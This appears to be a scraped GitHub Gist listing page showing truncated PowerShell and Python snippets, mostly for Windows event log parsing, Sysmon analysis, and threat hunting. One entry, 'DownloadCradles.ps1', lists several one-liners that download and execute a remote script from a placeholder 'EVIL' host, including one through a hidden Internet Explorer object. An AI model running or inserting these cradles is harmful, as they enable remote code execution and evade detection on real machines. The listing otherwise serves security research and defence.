Fred Frey fryguy04
@infosec-intern
infosec-intern / Evtx-to-JSON.ps1
Created December 9, 2017 22:13
Convert a Windows event log record into a JSON document
# LogName can be any available event log
# or it can be replaced with "-Path" and a file path
# The resulting JSON can then be POSTed to a webserver of your choice
Get-WinEvent -LogName "Security" -MaxEvents 1 | ConvertTo-Json
@psrdrgz
psrdrgz / SysmonCheck.ps1
Created November 21, 2017 01:44
PowerShell functions for parsing Sysmon event logs
using namespace System.Management.Automation
function Search-SysmonCommandline
{
[CmdletBinding(DefaultParameterSetName='InProcess')]
Param(
[Parameter(Mandatory = $True)]
[string[]]$CommandLine,
[Parameter(Mandatory = $False)]
@truekonrads
truekonrads / evtx_to_json.py
Created July 20, 2017 19:59
Convert evtx to json
#!/usr/bin/env python
# Convert evtx to json
import Evtx.Evtx as evtx
import sys
import json
def recursive_dict(element):
# https://stackoverflow.com/questions/42925074/python-lxml-etree-element-to-json-or-dict
t = element.tag
@HarmJ0y
HarmJ0y / Get-NonstandardService.ps1
Created June 7, 2017 01:11
Get-NonstandardService
function Get-NonstandardService {
<#
.SYNOPSIS
Returns services where the associated binaries are either not signed, or are
signed by an issuer not matching 'Microsoft'.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
@pkerpedjiev
pkerpedjiev / .d3v4-selectable-force-directed-graph
Last active March 2, 2022 11:10
D3v4 Selectable, Draggable, Zoomable Force Directed Graph
@jaredcatkinson
jaredcatkinson / Get-InjectedThread.ps1
Last active April 22, 2024 19:09
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION
@HarmJ0y
HarmJ0y / DownloadCradles.ps1
Last active April 14, 2024 23:56
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@RamblingCookieMonster
RamblingCookieMonster / Get-WinEventData and Sysmon.ps1
Last active October 29, 2022 14:28
Extract detailed data from Sysmon event logs
# Download and dot source Get-WinEventData
# https://gallery.technet.microsoft.com/scriptcenter/Get-WinEventData-Extract-344ad840
. "\\path\to\Get-WinEventData.ps1"
# Download and Set up Sysmon as desired
# http://technet.microsoft.com/en-us/sysinternals/dn798348
# http://www.darkoperator.com/blog/2014/8/8/sysinternals-sysmon
#Use Get-WinEvent and Get-WinEventData to obtain events and extract XML data from them - let's see all the properties behind one!
Get-WinEvent -FilterHashtable @{logname="Microsoft-Windows-Sysmon/Operational";id=3} |
@andrewschoen
andrewschoen / S3 bucket sync
Created February 3, 2012 21:22
Python script to sync an S3 bucket to the local file system
# -*- coding: utf-8 -*-
import os
import StringIO
import hashlib
try:
from boto.s3.connection import S3Connection
from boto.s3.key import Key
except ImportError:
raise ImproperlyConfigured, "Could not load Boto's S3 bindings."